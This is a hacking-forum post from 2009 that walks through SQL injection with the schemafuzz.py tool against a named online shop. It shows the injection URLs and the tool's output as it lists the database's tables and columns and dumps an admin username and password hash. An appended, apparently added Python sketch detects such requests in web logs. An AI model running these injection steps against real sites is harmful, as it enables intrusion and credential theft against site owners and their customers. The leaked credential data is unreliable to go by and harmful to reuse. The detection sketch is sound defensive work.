August 7, 2009, 8:43 AM
schemafuzz.py
What you need to prepare:
1. Python, download from http://www.python.org/ftp/python/2.5/python-2.5.msi
2. Schemafuzz >>> http://darkc0de.com/others/schemafuzz.py
3. CMD

Open CMD and change to the folder that contains schemafuzz.py.
The command format is >> schemafuzz.py -u "target" --perintah (where --perintah stands for the option to run)

To make it clearer, let's go straight to the scene, lol

1. Find a target. This is our target >>>
http://www.sleeppost.com/viewproduct.php?pid=923

2. Check the columns
Code:
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923" --findcol


The output will be:

Quote:
[+] URL: http://www.sleeppost.com/viewproduct.php?pid=923--
[+] Evasion Used: "+" "--"
[+] 09:44:10
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,6,
[+] Column Length is: 7
[+] Found null column at column #: 0
[+] SQLi URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6--
[+] darkc0de URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6
[-] Done!



Now we use this URL for the injection: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6


3. Find the database
Code:
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6" --dbs


Quote:

[+] URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 09:56:47
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[0] ??sleeppo_store?

[-] 09:57:00
[-] Total URL Requests 3
[-] Done


See, the database name is visible now, lol: sleeppo_store


4. Find the table names in the database
Code:
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6" --schema -D sleeppo_store


Quote:

[+] URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 10:02:56
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Showing Tables & Columns from database "sleeppo_store"
[+] Number of Tables: 20

[Database]: sleeppo_store
[Table: Columns]

[0]advertisement: id,image,url
[1]brands: name
[2]category: cid,parent,name
[3]config: adminemail1,adminemail2,adminemail3,salesemail,enquiryemail,adminlogin,adminpassword,orderemailsubject,orderemailheader,orderemailfooter,orderwebheader,orderwebfooter,sms
[4]emailgroup: gid,name
[5]emailgroupmember: gid,email
[6]emails: email,name
[7]faqreply: fid,faqquestion,faqanswer,fdate
[8]faqrequest: fid,email,faqquestion,fdate,status,name,contact
[9]news: nid,title,detail,ndate,link_cid,link_pid,active
[10]orderitem: ordernum,pid,pname,vid,brand,variance,price,sellprice,discount,qty,type
[11]orders: ordernum,name,email,contact,address,status,country,ddate,dname,demail,dcontact,daddress,dcountry,paytype,worldpayid,ttime,remarks,refno,deliverydate,deliverytime,paymentmode,remarks2
[12]outlet: outlet_id,outlet_name,outlet_address,outlet_tel
[13]product: pid,cid,brand,name,pno,detail,recommend
[14]productrel: pid,vtype,variance
[15]productvariance: vid,pid,variance,thick,vtype,vno,detail,price,sellprice,firm,colour
[16]promotionitems: id,promotion_id,item_type,cid,brand,pid,vid,discount,rating
[17]promotions: promotion_id,title,detail,startdate,enddate
[18]users: uid,name,email,contact,address
[19]warranty: wid,name,address,email,submitdate,date,invoice,model,size,period,survey,qty

[-] 10:24:51
[-] Total URL Requests 139
[-] Done


So that site has 20 tables, and the columns are listed too. Just pick which one you want to exploit :p


5. Exploit the table and columns
Code:
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6" --dump -D sleeppo_store -T config -C adminlogin,adminpassword


Quote:

[+] URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 10:36:59
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Dumping data from database "sleeppo_store" Table "config"
[+] and Column(s) ['adminlogin', 'adminpassword']
[+] Number of Rows: 3

[0] liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn:
[1] No data
[2] No data
[3] No data

[-] 10:37:36
[-] Total URL Requests 5
[-] Done


Hehe... the username and password are now visible; the password just needs to be decrypted ;)

The method above applies to MySQL version 5. For version 4, use the --fuzz option to find the table and column names.

Example:
Code:
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6" --fuzz


Some of the options:
--fuzz >>> finds column and table names on SQL v4
--schema >>> shows the table names
--dump >>> shows the contents of columns
--findcol >>> finds the darkc0de (column)

Feel free to look up the others. Just read the help :p

Hope this is useful :)

copas[at]cyberdos.org
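
Seen from the server side, the requests in this walkthrough leave a recognizable shape in the web access log: an always-false `AND 1=2`, a `UNION SELECT` with a numbered column list, the literal `darkc0de` marker and a trailing `--`. The Python sketch below is an added example, not part of the original post or of schemafuzz; the log lines are constructed, and the rule names and the two-rule threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (combined log format). Client addresses are
# documentation-range IPs; the paths mirror the request shape shown above.
SAMPLE_LOG = '''\
203.0.113.7 - - [07/Aug/2009:09:44:01 +0000] "GET /viewproduct.php?pid=923 HTTP/1.1" 200 5120
203.0.113.7 - - [07/Aug/2009:09:44:10 +0000] "GET /viewproduct.php?pid=923+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6-- HTTP/1.1" 200 4811
203.0.113.7 - - [07/Aug/2009:09:44:11 +0000] "GET /viewproduct.php?pid=923+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6-- HTTP/1.1" 200 4820
198.51.100.20 - - [07/Aug/2009:09:50:00 +0000] "GET /search.php?q=student+union+select+committee HTTP/1.1" 200 900
'''

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" \d{3} \S+')
RULES = {  # hypothetical rule names, chosen for this example
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "tool_marker": re.compile(r"darkc0de"),
    "trailing_comment": re.compile(r"--\s*$"),
}
CONST_CMP = re.compile(r"\band\s+(\d+)\s*=\s*(\d+)")

def classify(query):
    """Return the set of rule names that match one raw query string."""
    text = unquote_plus(query).lower()   # "+" and %XX become plain characters
    hits = {name for name, rx in RULES.items() if rx.search(text)}
    m = CONST_CMP.search(text)
    if m and m.group(1) != m.group(2):   # e.g. "and 1=2": always false
        hits.add("false_predicate")
    return hits

def scan(log_text, min_rules=2):
    """Map client IP -> (suspicious request count, sorted matched rules)."""
    counts, rules = defaultdict(int), defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                     # skip lines in another format
        hits = classify(urlsplit(m.group(2)).query)
        if len(hits) >= min_rules:       # one rule alone is too noisy
            counts[m.group(1)] += 1
            rules[m.group(1)] |= hits
    return {ip: (counts[ip], sorted(rules[ip])) for ip in counts}

if __name__ == "__main__":
    for ip, (n, matched) in scan(SAMPLE_LOG).items():
        print(ip, n, matched)
```

The search for "student union select committee" matches only one rule and is not reported, which is why the threshold is two. Alerting of this kind supplements, and does not replace, binding `pid` as a query parameter in the application.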

Category: Hacking | Views: 473 | Added by: SikuruZ | Rating: 0.0/0
Total comments: 2
2  
So how do you find the admin login, bro??

1  
So how do you find the admin login, bro???
